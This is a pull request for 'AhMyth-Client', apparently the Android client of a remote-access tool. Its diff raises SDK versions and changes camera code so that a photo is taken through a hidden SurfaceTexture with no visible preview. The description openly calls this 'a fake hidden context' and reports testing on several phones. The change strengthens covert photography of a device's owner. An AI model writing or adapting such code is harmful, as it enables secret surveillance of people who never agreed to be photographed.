### PR TITLE
Bugfix: Camera for latest models

### DIFF
--- a/AhMyth-Client/app/build.gradle
+++ b/AhMyth-Client/app/build.gradle
@@ -5,8 +5,8 @@ android {
     buildToolsVersion '25.0.0'
     defaultConfig {
         applicationId "ahmyth.mine.king.ahmyth"
-        minSdkVersion 10
-        targetSdkVersion 18
+        minSdkVersion 11
+        targetSdkVersion 24
         versionCode 1
         versionName "1.0"
         testInstrumentationRunner "android.support.test.runner.AndroidJUnitRunner"

--- a/AhMyth-Client/app/src/main/java/ahmyth/mine/king/ahmyth/CameraManager.java
+++ b/AhMyth-Client/app/src/main/java/ahmyth/mine/king/ahmyth/CameraManager.java
@@ -5,9 +5,10 @@ import android.content.Context;
 import android.content.pm.PackageManager;
 import android.graphics.Bitmap;
 import android.graphics.BitmapFactory;
+import android.graphics.SurfaceTexture;
 import android.hardware.Camera;
 import android.hardware.Camera.PictureCallback;
-
+import android.hardware.Camera.Parameters;
 
 import org.json.JSONArray;
 import org.json.JSONException;
@@ -28,9 +29,16 @@ public class CameraManager {
 
 
     public void startUp(int cameraID){
-
                 camera = Camera.open(cameraID);
-                camera.startPreview();
+                Parameters parameters = camera.getParameters();
+                camera.setParameters(parameters);
+                try{
+                    camera.setPreviewTexture(new SurfaceTexture(0));
+                    camera.startPreview();
+                } catch (Exception e) {
+                    e.printStackTrace();
+                }
+
                 camera.takePicture(null, null, new PictureCallback() {
                     @Override
                     public void onPictureTaken(byte[] data, Camera camera) {


### PR DESCRIPTION
Calling startPreview() requires a visible context from Android 4.0, but we can use SurfaceTexture which makes a fake hidden context and yet making it work properly. Should work stable from Android 4.0 onwards.

This is currently tested on Galaxy Note 5(Nougat), LG GPadX 8.0(Nougat), Pixel(Oreo).